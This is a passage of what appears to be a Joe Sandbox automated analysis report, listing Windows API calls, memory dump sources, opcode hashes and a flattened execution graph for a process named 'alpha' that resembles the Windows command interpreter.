                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153A1FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: /-Y
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1886669725-4274875248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 122d892b21f573a8c6b488a48e8ba572b5eb6560838035a42d71521a0751c07d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62011231D2E68B8AF716BB60E8A42BCB670BB51321FD50537E41B015B1CFECA484C670
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 112ff40a95d34841388b31947e1cf72a93c39629705f3855c594b603780d5e84
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD416D72A1A64B86FB54AF50E45427EB7A0EB45B40BD88136DA4F43760DFBCE444CB60

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        Execution Coverage:5.7%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Nodes:654
                                                                                                                                                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:27
22204->22205 22205->22203 22206 7ff7d151d208 _close 22206->22207 22207->22186 22207->22195 22207->22196 22207->22199 22207->22202 22207->22204 22207->22206 22209 7ff7d152c060 22207->22209 22211 7ff7d151b038 _dup2 22207->22211 22212 7ff7d152c246 22207->22212 22215 7ff7d15226e0 19 API calls 22207->22215 22218 7ff7d151b356 22207->22218 22243 7ff7d152c1a5 22207->22243 22546 7ff7d153f318 _get_osfhandle GetFileType 22207->22546 22210 7ff7d152c1f9 22208->22210 22209->22212 22216 7ff7d15209f4 2 API calls 22209->22216 22213 7ff7d151af98 2 API calls 22210->22213 22211->22207 22217 7ff7d151af98 2 API calls 22212->22217 22213->22186 22214 7ff7d151b038 _dup2 22219 7ff7d152c1b7 22214->22219 22215->22207 22220 7ff7d152c084 22216->22220 22221 7ff7d152c24b 22217->22221 22227 7ff7d151af98 2 API calls 22218->22227 22222 7ff7d152c207 22219->22222 22223 7ff7d152c1be 22219->22223 22224 7ff7d151b900 166 API calls 22220->22224 22225 7ff7d153f1d8 166 API calls 22221->22225 22226 7ff7d151d208 _close 22222->22226 22228 7ff7d151d208 _close 22223->22228 22229 7ff7d152c08c 22224->22229 22225->22186 22226->22218 22230 7ff7d152c211 22227->22230 22228->22204 22231 7ff7d152c094 wcsrchr 22229->22231 22241 7ff7d152c0ad 22229->22241 22232 7ff7d15233f0 _vsnwprintf 22230->22232 22231->22241 22233 7ff7d152c22c 22232->22233 22234 7ff7d1513278 166 API calls 22233->22234 22234->22186 22235 7ff7d152c106 22237 7ff7d151ff70 2 API calls 22235->22237 22236 7ff7d152c0e0 _wcsnicmp 22236->22241 22238 7ff7d152c13b 22237->22238 22238->22212 22239 7ff7d152c146 SearchPathW 22238->22239 22239->22212 22240 7ff7d152c188 22239->22240 22242 7ff7d15226e0 19 API calls 22240->22242 22241->22235 22241->22236 22242->22243 22243->22214 22245 7ff7d1517211 _setjmp 22244->22245 22249 7ff7d1517279 22244->22249 22247 7ff7d1517265 22245->22247 22245->22249 22547 7ff7d15172b0 22247->22547 22249->22060 22251 7ff7d151cb63 22250->22251 22252 7ff7d151cd90 166 API calls 22251->22252 22253 7ff7d151c848 22252->22253 22253->22105 22254 
7ff7d151cad4 22253->22254 22255 7ff7d151cad9 22254->22255 22263 7ff7d151cb05 22254->22263 22256 7ff7d151cd90 166 API calls 22255->22256 22255->22263 22257 7ff7d152c722 22256->22257 22258 7ff7d152c72e GetConsoleTitleW 22257->22258 22257->22263 22259 7ff7d152c74a 22258->22259 22258->22263 22260 7ff7d151b6b0 170 API calls 22259->22260 22265 7ff7d152c778 22260->22265 22261 7ff7d152c7ec 22262 7ff7d151ff70 2 API calls 22261->22262 22262->22263 22263->22105 22264 7ff7d152c7dd SetConsoleTitleW 22264->22261 22265->22261 22265->22264 22267 7ff7d15242ab UpdateProcThreadAttribute 22266->22267 22268 7ff7d152ecd4 GetLastError 22266->22268 22269 7ff7d15242eb memset memset GetStartupInfoW 22267->22269 22270 7ff7d152ecf0 GetLastError 22267->22270 22271 7ff7d152ecee 22268->22271 22273 7ff7d1523a90 170 API calls 22269->22273 22363 7ff7d1539eec 22270->22363 22275 7ff7d15243a8 22273->22275 22276 7ff7d151b900 166 API calls 22275->22276 22277 7ff7d15243bb 22276->22277 22278 7ff7d1524638 _local_unwind 22277->22278 22279 7ff7d15243cc 22277->22279 22278->22279 22280 7ff7d15243de wcsrchr 22279->22280 22281 7ff7d1524415 22279->22281 22280->22281 22282 7ff7d15243f7 lstrcmpW 22280->22282 22350 7ff7d1525a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22281->22350 22282->22281 22285 7ff7d1524668 22282->22285 22284 7ff7d152441a 22286 7ff7d152442a CreateProcessW 22284->22286 22289 7ff7d1524596 CreateProcessAsUserW 22284->22289 22351 7ff7d1539044 22285->22351 22288 7ff7d152448b 22286->22288 22290 7ff7d1524672 GetLastError 22288->22290 22291 7ff7d1524495 CloseHandle 22288->22291 22289->22288 22298 7ff7d152468d 22290->22298 22292 7ff7d152498c 8 API calls 22291->22292 22293 7ff7d15244c5 22292->22293 22297 7ff7d15244cd 22293->22297 22293->22298 22294 7ff7d15247a3 22294->22142 22295 7ff7d15244f8 22295->22294 22300 7ff7d1525cb4 7 API calls 22295->22300 22322 7ff7d1524612 22295->22322 22296 7ff7d151cd90 166 API calls 22299 7ff7d1524724 22296->22299 22297->22294 22297->22295 22312 
7ff7d153a250 33 API calls 22297->22312 22298->22296 22298->22297 22302 7ff7d152472c _local_unwind 22299->22302 22309 7ff7d152473d 22299->22309 22304 7ff7d1524517 22300->22304 22301 7ff7d152461c 22305 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22301->22305 22302->22309 22303 7ff7d15247e1 CloseHandle 22303->22301 22306 7ff7d15233f0 _vsnwprintf 22304->22306 22307 7ff7d15247fa DeleteProcThreadAttributeList 22305->22307 22308 7ff7d1524544 22306->22308 22310 7ff7d1528f80 7 API calls 22307->22310 22311 7ff7d152498c 8 API calls 22308->22311 22317 7ff7d151ff70 GetProcessHeap RtlFreeHeap 22309->22317 22313 7ff7d1524820 22310->22313 22314 7ff7d1524558 22311->22314 22312->22295 22313->22142 22315 7ff7d15247ae 22314->22315 22316 7ff7d1524564 22314->22316 22319 7ff7d15233f0 _vsnwprintf 22315->22319 22318 7ff7d152498c 8 API calls 22316->22318 22320 7ff7d152475b _local_unwind 22317->22320 22321 7ff7d1524577 22318->22321 22319->22322 22320->22297 22321->22301 22323 7ff7d152457f 22321->22323 22322->22301 22322->22303 22324 7ff7d153a920 210 API calls 22323->22324 22325 7ff7d1524584 22324->22325 22325->22301 22339 7ff7d1519737 22326->22339 22328 7ff7d151cd90 166 API calls 22328->22339 22329 7ff7d151977d memset 22330 7ff7d151ca40 17 API calls 22329->22330 22330->22339 22331 7ff7d152b76e 22333 7ff7d1513278 166 API calls 22331->22333 22332 7ff7d152b7b3 22335 7ff7d152b787 22333->22335 22334 7ff7d152b79a 22337 7ff7d152855c ??_V@YAXPEAX 22334->22337 22338 7ff7d152b795 22335->22338 22340 7ff7d153e944 393 API calls 22335->22340 22336 7ff7d151b364 17 API calls 22336->22339 22337->22332 22448 7ff7d1537694 22338->22448 22339->22328 22339->22329 22339->22331 22339->22332 22339->22334 22339->22336 22344 7ff7d15196b4 186 API calls 22339->22344 22345 7ff7d151986d 22339->22345 22365 7ff7d1521fac memset 22339->22365 22392 7ff7d151ce10 22339->22392 22442 7ff7d1525920 22339->22442 22340->22338 22344->22339 22346 7ff7d151988c 22345->22346 22347 7ff7d1519880 ??_V@YAXPEAX 22345->22347 22348 7ff7d1528f80 7 API 
calls 22346->22348 22347->22346 22349 7ff7d151989d 22348->22349 22349->22142 22352 7ff7d1523a90 170 API calls 22351->22352 22353 7ff7d1539064 22352->22353 22354 7ff7d153906e 22353->22354 22355 7ff7d1539083 22353->22355 22356 7ff7d152498c 8 API calls 22354->22356 22358 7ff7d151cd90 166 API calls 22355->22358 22357 7ff7d1539081 22356->22357 22357->22281 22359 7ff7d153909b 22358->22359 22359->22357 22360 7ff7d152498c 8 API calls 22359->22360 22361 7ff7d15390ec 22360->22361 22362 7ff7d151ff70 2 API calls 22361->22362 22362->22357 22364 7ff7d152ed0a DeleteProcThreadAttributeList 22363->22364 22364->22271 22366 7ff7d152203b 22365->22366 22367 7ff7d15220b0 22366->22367 22368 7ff7d1522094 22366->22368 22369 7ff7d1523060 171 API calls 22367->22369 22371 7ff7d152211c 22367->22371 22370 7ff7d15220a6 22368->22370 22372 7ff7d1513278 166 API calls 22368->22372 22369->22371 22373 7ff7d1528f80 7 API calls 22370->22373 22371->22370 22374 7ff7d1522e44 2 API calls 22371->22374 22372->22370 22375 7ff7d1522325 22373->22375 22376 7ff7d1522148 22374->22376 22375->22339 22376->22370 22377 7ff7d1522d70 3 API calls 22376->22377 22378 7ff7d15221af 22377->22378 22379 7ff7d151b900 166 API calls 22378->22379 22381 7ff7d15221d0 22379->22381 22380 7ff7d152e04a ??_V@YAXPEAX 22380->22370 22381->22380 22382 7ff7d152221c wcsspn 22381->22382 22391 7ff7d15222a4 ??_V@YAXPEAX 22381->22391 22384 7ff7d151b900 166 API calls 22382->22384 22385 7ff7d152223b 22384->22385 22385->22380 22389 7ff7d1522252 22385->22389 22386 7ff7d152228f 22387 7ff7d151d3f0 223 API calls 22386->22387 22387->22391 22388 7ff7d152e06d wcschr 22388->22389 22389->22386 22389->22388 22390 7ff7d152e090 towupper 22389->22390 22390->22386 22390->22389 22391->22370 22393 7ff7d151d0f8 22392->22393 22412 7ff7d151ce5b 22392->22412 22394 7ff7d1528f80 7 API calls 22393->22394 22397 7ff7d151d10a 22394->22397 22395 7ff7d152c860 22396 7ff7d152c97c 22395->22396 22399 7ff7d153ee88 390 API calls 22395->22399 22400 7ff7d153e9b4 197 API calls 
22396->22400 22397->22339 22398 7ff7d1520494 182 API calls 22398->22412 22401 7ff7d152c879 22399->22401 22402 7ff7d152c981 longjmp 22400->22402 22403 7ff7d152c95c 22401->22403 22404 7ff7d152c882 EnterCriticalSection LeaveCriticalSection 22401->22404 22405 7ff7d152c99a 22402->22405 22403->22396 22408 7ff7d15196b4 186 API calls 22403->22408 22418 7ff7d151d0e3 22404->22418 22405->22393 22407 7ff7d152c9b3 ??_V@YAXPEAX 22405->22407 22407->22393 22408->22403 22409 7ff7d151ceaa _tell 22410 7ff7d151d208 _close 22409->22410 22410->22412 22411 7ff7d151cd90 166 API calls 22411->22412 22412->22393 22412->22395 22412->22398 22412->22405 22412->22411 22413 7ff7d152c9d5 22412->22413 22415 7ff7d151b900 166 API calls 22412->22415 22412->22418 22422 7ff7d151cf33 memset 22412->22422 22425 7ff7d151ca40 17 API calls 22412->22425 22426 7ff7d151d184 wcschr 22412->22426 22427 7ff7d153bfec 176 API calls 22412->22427 22428 7ff7d152c9c9 22412->22428 22429 7ff7d151d1a7 wcschr 22412->22429 22431 7ff7d153778c 166 API calls 22412->22431 22432 7ff7d151be00 635 API calls 22412->22432 22433 7ff7d1520a6c 273 API calls 22412->22433 22434 7ff7d1523448 166 API calls 22412->22434 22435 7ff7d1520580 12 API calls 22412->22435 22436 7ff7d151cfab _wcsicmp 22412->22436 22440 7ff7d1521fac 238 API calls 22412->22440 22441 7ff7d151d044 ??_V@YAXPEAX 22412->22441 22454 7ff7d151df60 22412->22454 22474 7ff7d153c738 22412->22474 22414 7ff7d153d610 167 API calls 22413->22414 22417 7ff7d152c9da 22414->22417 22415->22412 22416 7ff7d152ca07 22419 7ff7d153e91c 198 API calls 22416->22419 22417->22416 22420 7ff7d153bfec 176 API calls 22417->22420 22418->22339 22424 7ff7d152ca0c 22419->22424 22421 7ff7d152c9f1 22420->22421 22423 7ff7d1513240 166 API calls 22421->22423 22422->22412 22423->22416 22424->22339 22425->22412 22426->22412 22427->22412 22430 7ff7d152855c ??_V@YAXPEAX 22428->22430 22429->22412 22430->22393 22431->22412 22432->22412 22433->22412 22434->22412 22437 7ff7d151d003 GetConsoleOutputCP GetCPInfo 
22435->22437 22436->22412 22438 7ff7d15204f4 3 API calls 22437->22438 22438->22412 22440->22412 22441->22412 22443 7ff7d152596c 22442->22443 22447 7ff7d1525a12 22442->22447 22444 7ff7d152598d VirtualQuery 22443->22444 22443->22447 22446 7ff7d15259ad 22444->22446 22444->22447 22445 7ff7d15259b7 VirtualQuery 22445->22446 22445->22447 22446->22445 22446->22447 22447->22339 22449 7ff7d15376a3 22448->22449 22450 7ff7d15376b7 22449->22450 22452 7ff7d15196b4 186 API calls 22449->22452 22451 7ff7d153e9b4 197 API calls 22450->22451 22453 7ff7d15376bc longjmp 22451->22453 22452->22449 22455 7ff7d151dfe2 22454->22455 22456 7ff7d151df93 22454->22456 22458 7ff7d151e100 VirtualFree 22455->22458 22459 7ff7d151e00b _setjmp 22455->22459 22456->22455 22457 7ff7d151df9f GetProcessHeap RtlFreeHeap 22456->22457 22457->22455 22457->22456 22458->22455 22460 7ff7d151e04a 22459->22460 22461 7ff7d151e0c3 22459->22461 22462 7ff7d151e600 473 API calls 22460->22462 22461->22409 22463 7ff7d151e073 22462->22463 22464 7ff7d151e0e0 longjmp 22463->22464 22465 7ff7d151e081 22463->22465 22466 7ff7d151e0b0 22464->22466 22467 7ff7d151d250 475 API calls 22465->22467 22466->22461 22484 7ff7d153d3fc 22466->22484 22468 7ff7d151e086 22467->22468 22468->22466 22471 7ff7d151e600 473 API calls 22468->22471 22472 7ff7d151e0a7 22471->22472 22472->22466 22473 7ff7d153d610 167 API calls 22472->22473 22473->22466 22475 7ff7d153c775 22474->22475 22479 7ff7d153c7ab 22474->22479 22476 7ff7d151cd90 166 API calls 22475->22476 22478 7ff7d153c781 22476->22478 22477 7ff7d153c8d4 22477->22412 22478->22477 22480 7ff7d151b0d8 194 API calls 22478->22480 22479->22477 22479->22478 22481 7ff7d151b6b0 170 API calls 22479->22481 22482 7ff7d151b038 _dup2 22479->22482 22483 7ff7d151d208 _close 22479->22483 22480->22477 22481->22479 22482->22479 22483->22479 22501 7ff7d153d419 22484->22501 22485 7ff7d152cadf 22486 7ff7d1523448 166 API calls 22486->22501 22487 7ff7d153d592 22489 7ff7d1523448 166 API calls 22487->22489 22488 
7ff7d153d5c4 22490 7ff7d1523448 166 API calls 22488->22490 22492 7ff7d153d5a5 22489->22492 22490->22485 22493 7ff7d153d5ba 22492->22493 22495 7ff7d1523448 166 API calls 22492->22495 22502 7ff7d153d36c 22493->22502 22494 7ff7d153d546 22494->22488 22497 7ff7d153d555 22494->22497 22495->22493 22509 7ff7d153d31c 22497->22509 22498 7ff7d153d541 22498->22487 22498->22488 22498->22494 22500 7ff7d153d589 22498->22500 22499 7ff7d153d3fc 166 API calls 22499->22501 22500->22487 22500->22497 22501->22485 22501->22486 22501->22487 22501->22488 22501->22497 22501->22498 22501->22499 22503 7ff7d153d3d8 22502->22503 22504 7ff7d153d381 22502->22504 22505 7ff7d15234a0 166 API calls 22504->22505 22507 7ff7d153d390 22505->22507 22506 7ff7d1523448 166 API calls 22506->22507 22507->22503 22507->22506 22508 7ff7d15234a0 166 API calls 22507->22508 22508->22507 22510 7ff7d1523448 166 API calls 22509->22510 22511 7ff7d153d33b 22510->22511 22512 7ff7d153d36c 166 API calls 22511->22512 22513 7ff7d153d343 22512->22513 22514 7ff7d153d3fc 166 API calls 22513->22514 22519 7ff7d153d34e 22514->22519 22515 7ff7d153d5c2 22515->22485 22516 7ff7d153d592 22518 7ff7d1523448 166 API calls 22516->22518 22517 7ff7d153d5c4 22520 7ff7d1523448 166 API calls 22517->22520 22522 7ff7d153d5a5 22518->22522 22519->22515 22519->22516 22519->22517 22524 7ff7d1523448 166 API calls 22519->22524 22527 7ff7d153d541 22519->22527 22530 7ff7d153d555 22519->22530 22531 7ff7d153d3fc 166 API calls 22519->22531 22520->22515 22521 7ff7d153d31c 166 API calls 22521->22515 22523 7ff7d153d5ba 22522->22523 22525 7ff7d1523448 166 API calls 22522->22525 22526 7ff7d153d36c 166 API calls 22523->22526 22524->22519 22525->22523 22526->22515 22527->22516 22527->22517 22528 7ff7d153d546 22527->22528 22529 7ff7d153d589 22527->22529 22528->22517 22528->22530 22529->22516 22529->22530 22530->22521 22531->22519 22533 7ff7d151c4c9 22532->22533 22534 7ff7d151c486 22532->22534 22537 7ff7d151ff70 2 API calls 22533->22537 22539 7ff7d151c161 
22533->22539 22535 7ff7d151c48e wcschr 22534->22535 22534->22539 22536 7ff7d151c4ef 22535->22536 22535->22539 22538 7ff7d151cd90 166 API calls 22536->22538 22537->22539 22540 7ff7d151c4f9 22538->22540 22539->22171 22539->22172 22540->22539 22541 7ff7d151d840 178 API calls 22540->22541 22544 7ff7d151c5bd 22540->22544 22545 7ff7d151c541 22540->22545 22541->22540 22542 7ff7d151ff70 2 API calls 22542->22539 22543 7ff7d151b6b0 170 API calls 22543->22545 22544->22543 22544->22545 22545->22539 22545->22542 22546->22207 22548 7ff7d15172de 22547->22548 22549 7ff7d1534621 22547->22549 22551 7ff7d15172eb 22548->22551 22555 7ff7d1534467 22548->22555 22556 7ff7d1534530 22548->22556 22550 7ff7d15347e0 22549->22550 22552 7ff7d153447b longjmp 22549->22552 22557 7ff7d1534639 22549->22557 22564 7ff7d153475e 22549->22564 22553 7ff7d1517348 168 API calls 22550->22553 22608 7ff7d1517348 22551->22608 22558 7ff7d1534492 22552->22558 22607 7ff7d1534524 22553->22607 22555->22551 22555->22558 22567 7ff7d1534475 22555->22567 22563 7ff7d1517348 168 API calls 22556->22563 22560 7ff7d153463e 22557->22560 22561 7ff7d1534695 22557->22561 22562 7ff7d1517348 168 API calls 22558->22562 22560->22552 22580 7ff7d1534654 22560->22580 22566 7ff7d15173d4 168 API calls 22561->22566 22569 7ff7d15344a8 22562->22569 22570 7ff7d1534549 22563->22570 22568 7ff7d1517348 168 API calls 22564->22568 22565 7ff7d1517315 22623 7ff7d15173d4 22565->22623 22594 7ff7d153469a 22566->22594 22567->22552 22567->22561 22568->22550 22581 7ff7d15344e2 22569->22581 22586 7ff7d1517348 168 API calls 22569->22586 22574 7ff7d15345b2 22570->22574 22582 7ff7d153455e 22570->22582 22593 7ff7d1517348 168 API calls 22570->22593 22571 7ff7d15172b0 168 API calls 22575 7ff7d153480e 22571->22575 22572 7ff7d1517348 168 API calls 22572->22565 22576 7ff7d1517348 168 API calls 22574->22576 22575->22249 22579 7ff7d15345c7 22576->22579 22577 7ff7d15172b0 168 API calls 22588 7ff7d1534738 22577->22588 22578 7ff7d15346e1 22578->22577 22585 7ff7d1517348 
168 API calls 22579->22585 22583 7ff7d1517348 168 API calls 22580->22583 22587 7ff7d15172b0 168 API calls 22581->22587 22582->22574 22584 7ff7d1517348 168 API calls 22582->22584 22589 7ff7d1517323 22583->22589 22584->22574 22592 7ff7d15345db 22585->22592 22586->22581 22590 7ff7d15344f1 22587->22590 22591 7ff7d1517348 168 API calls 22588->22591 22589->22249 22596 7ff7d15172b0 168 API calls 22590->22596 22591->22607 22595 7ff7d1517348 168 API calls 22592->22595 22593->22582 22594->22578 22598 7ff7d15346ea 22594->22598 22599 7ff7d15346c7 22594->22599 22600 7ff7d15345ec 22595->22600 22597 7ff7d1534503 22596->22597 22597->22589 22603 7ff7d1517348 168 API calls 22597->22603 22601 7ff7d1517348 168 API calls 22598->22601 22599->22578 22604 7ff7d1517348 168 API calls 22599->22604 22602 7ff7d1517348 168 API calls 22600->22602 22601->22578 22605 7ff7d1534600 22602->22605 22603->22607 22604->22578 22606 7ff7d1517348 168 API calls 22605->22606 22606->22607 22607->22571 22607->22589 22615 7ff7d151735d 22608->22615 22609 7ff7d1513278 166 API calls 22610 7ff7d1534820 longjmp 22609->22610 22611 7ff7d1534838 22610->22611 22612 7ff7d1513278 166 API calls 22611->22612 22613 7ff7d1534844 longjmp 22612->22613 22614 7ff7d153485a 22613->22614 22616 7ff7d1517348 166 API calls 22614->22616 22615->22609 22615->22611 22615->22615 22622 7ff7d15173ab 22615->22622 22617 7ff7d153487b 22616->22617 22618 7ff7d1517348 166 API calls 22617->22618 22619 7ff7d15348ad 22618->22619 22620 7ff7d1517348 166 API calls 22619->22620 22621 7ff7d15172ff 22620->22621 22621->22565 22621->22572 22624 7ff7d1517401 22623->22624 22624->22589 22625 7ff7d1517348 168 API calls 22624->22625 22626 7ff7d153487b 22625->22626 22627 7ff7d1517348 168 API calls 22626->22627 22628 7ff7d15348ad 22627->22628 22629 7ff7d1517348 168 API calls 22628->22629 22630 7ff7d15348be 22629->22630 22630->22589
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
• Instruction ID: 26f6fce0b16e7127b0682493bc88e9228820a00b601e91ffb9aa57b5547d5f30
• Opcode Fuzzy Hash: a975c169337b17d968cd9f1c462eb67e92374e13dbe6492fed788defac36e88e
• Instruction Fuzzy Hash: 0042D662A0968B85FB50AB1198502BEE7A1EF85794FD44272DD1F877F5DFBCE0448320

Control-flow Graph (legend: Executed / Not Executed)
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
